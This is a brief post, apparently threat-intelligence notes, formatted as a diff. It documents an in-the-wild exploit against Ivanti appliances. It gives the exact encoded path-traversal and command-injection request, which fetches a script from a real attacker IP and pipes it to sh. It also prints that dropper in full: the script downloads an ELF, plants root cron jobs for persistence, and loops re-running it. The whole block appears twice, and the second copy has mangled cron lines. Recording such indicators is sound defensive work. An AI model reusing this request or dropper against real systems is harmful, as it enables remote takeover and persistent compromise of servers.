kimber99 · January 22, 2024 17:40
diff --git a/ivanti_jan2024.txt b/ivanti_jan2024.txt
 first stage: /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f%34%35%2e%31%33%30%2e%32%32%2e%32%31%39%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a
 decodes to: /api/v1/totp/user-backup-code/../../license/keys-status/;wget --timeout=20 --no-check-certificate -q -O- https://45.130.22.219/ivanti.js|sh;

 index of hosting on 45.130.22.219 says "Hacked by voadu"
 scanned on URLScan.io Submission: On January 22 via manual (January 22nd 2024, 3:26:21 am UTC) from JP  — Scanned from NL 
 ivanti.js:
 #!/bin/bash
 url='https://45.130.22.219/ivanti'
 name1=`date +%s%N`
 wget --no-check-certificate ${url} -O /etc/$name1
 chmod +x /etc/$name1
 echo "*/10 * * * * root /etc/$name1" >> /etc/cron.d/$name1
 /etc/$name1

 name2=`date +%s%N`
 curl -k ${url} -o /etc/$name2
 chmod +x /etc/$name2
 echo "*/10 * * * * root /etc/$name2" >> /etc/cron.d/$name2
 /etc/$name2

 name3=`date +%s%N`
 wget --no-check-certificate ${url} -O /tmp/$name3
 chmod +x /tmp/$name3
 (crontab -l ; echo "*/10 * * * * /tmp/$name3") | crontab -
 /tmp/$name3

 name4=`date +%s%N`
 curl -k ${url} -o /var/tmp/$name4
 chmod +x /var/tmp/$name4
 (crontab -l ; echo "*/10 * * * * /var/tmp/$name4") | crontab -
 /var/tmp/$name4

 while true
 do
 	chmod +x /etc/$name1
 	/etc/$name1
 	sleep 60
 	chmod +x /etc/$name2
 	/etc/$name2
 	sleep 60
 	chmod +x /tmp/$name3
 	/tmp/$name3
 	sleep 60
 	chmod +x /var/tmp/$name4
 	/var/tmp/$name4
 	sleep 60
 done
 
 
 https://45.130.22.219/ivanti - shitty elf that i'm not gonna poke at (MIME: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped)
	first stage: /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f%34%35%2e%31%33%30%2e%32%32%2e%32%31%39%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a
	decodes to: /api/v1/totp/user-backup-code/../../license/keys-status/;wget --timeout=20 --no-check-certificate -q -O- https://45.130.22.219/ivanti.js\|sh;

	index of hosting on 45.130.22.219 says "Hacked by voadu"
	scanned on URLScan.io Submission: On January 22 via manual (January 22nd 2024, 3:26:21 am UTC) from JP — Scanned from NL
	ivanti.js:
	#!/bin/bash
	url='https://45.130.22.219/ivanti'
	name1=`date +%s%N`
	wget --no-check-certificate ${url} -O /etc/$name1
	chmod +x /etc/$name1
	echo "/10 * * * root /etc/$name1" >> /etc/cron.d/$name1
	/etc/$name1

	name2=`date +%s%N`
	curl -k ${url} -o /etc/$name2
	chmod +x /etc/$name2
	echo "/10 * * * root /etc/$name2" >> /etc/cron.d/$name2
	/etc/$name2

	name3=`date +%s%N`
	wget --no-check-certificate ${url} -O /tmp/$name3
	chmod +x /tmp/$name3
	(crontab -l ; echo "/10 * * * /tmp/$name3") \| crontab -
	/tmp/$name3

	name4=`date +%s%N`
	curl -k ${url} -o /var/tmp/$name4
	chmod +x /var/tmp/$name4
	(crontab -l ; echo "/10 * * * /var/tmp/$name4") \| crontab -
	/var/tmp/$name4

	while true
	do
	chmod +x /etc/$name1
	/etc/$name1
	sleep 60
	chmod +x /etc/$name2
	/etc/$name2
	sleep 60
	chmod +x /tmp/$name3
	/tmp/$name3
	sleep 60
	chmod +x /var/tmp/$name4
	/var/tmp/$name4
	sleep 60
	done


	https://45.130.22.219/ivanti - shitty elf that i'm not gonna poke at (MIME: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped)